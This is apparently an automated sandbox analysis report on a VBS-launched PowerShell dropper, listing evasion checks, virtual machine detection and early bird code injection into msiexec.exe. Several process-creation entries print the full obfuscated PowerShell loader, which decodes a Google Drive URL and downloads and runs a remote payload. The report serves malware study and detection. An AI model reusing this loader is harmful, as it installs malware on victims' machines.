              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Potential evasive VBS script found (sleep loop)
              Source: Initial fileInitial file: Do While Aalekragerne.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4720Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5211Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7844Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1735Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4848Thread sleep count: 35 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 0000000C.00000002.2222859365.00000000075D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
              Source: PING.EXE, 00000001.00000002.1300585394.000002408B3E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv%
              Source: msiexec.exe, 0000000C.00000002.2222859365.00000000075D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: powershell.exe, 00000003.00000002.1592246740.0000026D7472E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7624.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3730000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBolJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $elselskaber;function xanthorrhiza($diagnostikkernes){ .($optimalvaerdi) ($diagnostikkernes)} function raspite($ambivalentes){$smaabarnsalderen=4;do{$summker+=$ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$skaberaktapirer=format-list} until(!$ambivalentes[$smaabarnsalderen])$summker}$spaltedefinitionen=raspite ' ndnhjlpem thtthra.lesiw';$spaltedefinitionen+=raspite 'masteb,reb di cteralsl giassiebeh,n irt';$choremen=raspite 'ro fm forosa,izgagsimpanlunc lant ademe/';$polytungstate=raspite 'sanitgogolstifs agu1 afs2';$hematohidrosis='inve[no.nnslute rabt k l.anthsunexe,essrquinvmillitolacmillestraptrido pericontnopsut udvmom,ia s lnorgaa b,rgbeg,estemrka,e]f,rf:duch:h.pos hijeph,ecudfrusnekrprotiincot.araybuckpflotrsky ovolttko gofor ctriao ortlwar =taag$statp puno grilneu yempetgoo uoec nsmregtills shatsv daovertprope';$choremen+=raspite 'rets5lede.de i0 enc doe(attaw angicompn ynkdop rov.trwfangs spr s.rindioxtfaca misa1t ta0cruc.dile0hjem;genl unpewvulginedknradi6tilb4bybu;sp l k igx nap6graf4mu t; ndt frormontvskib:t mm1past3 den4 trl.unmo0fal )a la forsg knaemigrcoophkger,ofjl./ar.e2unr 0 v n1zair0peri0skab1benz0phys1ran plefclasi mstrflaweseksfuopdo allxpala/du,n1 .nt3hjul4rall.gibb0';$gyldigheder=raspite 'formusocispo aekibbrinst-hr,eanobigextrefordnbi et';$reaccepted=raspite 'opdrhpaaktuordt e,cp actsport:b,ro/vldi/ la,dudsor c.ciudvivintae sid.car g dskorag o th gfeeblp eseudpa.outwc emeosnnemb se/omn,u ankc unq?muskesignx i,rp ormoa rer bo tk rn=.dspdhensot,ylw datnsavnlpolyokonta.occdpree& biginajad gru=b rn1 for2vedlo amapindf5sho.as ymslodnibathysdcextemae.abrkundeohairntes 8 sniaaga z,fvevvend9u pedolivtm ttsov r0domfsundljtranh spijhypnubo lxorthjtapptlrlisterrm';$genette=raspite 'loph>';$optimalvaerdi=raspite 'forui d nechlox';$trafikkens='amfibietanken';$unphilosophize47='\unapplauding.ove';xanthorrhiza (raspite 'stre$ fsgbomblem.go kr,b ranandtelkut :minygstumrratiobrevwkapalhp te ondddiff9af,j6 myl=g.rt$ tilesku.ndaugv c b:somnaslu pcommp ardd flyabondt ediasupe+ exc$sammustranint,pnonph difiponyl supotopus proo rnepnonshsa tidmpezvolie chl4kerm7');xanthorrhiza (raspite 'udst$ fjeg,hril ingo afsb ostarisplfrdi:berbeshusr ectydrontbimah mesrgeneospatcmascyt avt ompe vi sbrdd=,ors$probr fore sala undcbag creveeamorphysttautoetuscdsond.solosalleprebolgl sibakktstik(foot$ kidgbirteavilnclube spatrepatrepue coq)');xanthorrhiza (raspite $hematohidrosis);$reaccepted=$erythrocytes[0];$beregningsgrundlag=(raspite 'helb$turigpi gl keno gribmaxiaabmhlregn:,peckhe dns goino dpstallnonsiunsin virgunanskabekpreljfritopa.tl,xfoelysonindds fin=ki,bnweasesalvw lnk-quo,o bumbs.spj,rbaelodgcgiggt doo sunfsbrouy recs hawtflukepartminv,.poly$c,mpsdobbpstopa ngalkatatslamehemodtromeantifjumbi metnegadikl.mtprovimalmovrdin cigeun rn');xanthorrhiza ($beregningsgrundlag);xanthorrhiza (raspite 's bi$ valkgen,nundeibol
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $elselskaber;function xanthorrhiza($diagnostikkernes){ .($optimalvaerdi) ($diagnostikkernes)} function raspite($ambivalentes){$smaabarnsalderen=4;do{$summker+=$ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$skaberaktapirer=format-list} until(!$ambivalentes[$smaabarnsalderen])$summker}$spaltedefinitionen=raspite ' ndnhjlpem thtthra.lesiw';$spaltedefinitionen+=raspite 'masteb,reb di cteralsl giassiebeh,n irt';$choremen=raspite 'ro fm forosa,izgagsimpanlunc lant ademe/';$polytungstate=raspite 'sanitgogolstifs agu1 afs2';$hematohidrosis='inve[no.nnslute rabt k l.anthsunexe,essrquinvmillitolacmillestraptrido pericontnopsut udvmom,ia s lnorgaa b,rgbeg,estemrka,e]f,rf:duch:h.pos hijeph,ecudfrusnekrprotiincot.araybuckpflotrsky ovolttko gofor ctriao ortlwar =taag$statp puno grilneu yempetgoo uoec nsmregtills shatsv daovertprope';$choremen+=raspite 'rets5lede.de 